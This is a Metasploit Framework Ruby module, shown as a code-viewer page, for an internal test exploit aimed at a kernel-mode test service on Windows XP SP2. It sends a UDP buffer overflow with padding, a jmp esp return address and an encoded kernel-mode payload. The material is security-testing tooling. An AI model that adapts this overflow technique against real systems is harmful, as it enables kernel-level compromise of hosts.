metasploit-framework/modules/exploits/test/kernel.rb

85 lines
1.8 KiB
Ruby
Raw Normal View History

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
#
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
sleep 2
disconnect_udp
end
end